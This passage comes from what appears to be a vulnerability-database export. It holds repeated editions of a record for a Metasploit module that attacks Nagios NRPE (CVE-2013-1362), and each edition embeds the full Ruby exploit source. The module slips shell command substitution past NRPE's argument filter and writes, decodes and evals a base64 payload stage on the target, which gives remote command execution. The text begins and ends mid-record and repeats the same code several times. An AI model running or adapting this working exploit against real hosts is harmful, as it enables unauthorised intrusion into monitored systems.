be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-01T13:05:21", "differentElements": ["modified", "published"], "edition": 78}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-01T15:01:23", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-01T15:01:23", "differentElements": ["modified", "published"], "edition": 79}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-02T21:07:03", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-02T21:07:03", "differentElements": ["modified", "published"], "edition": 80}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T01:10:03", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T01:10:03", "differentElements": ["modified", "published"], "edition": 81}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T07:17:10", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent 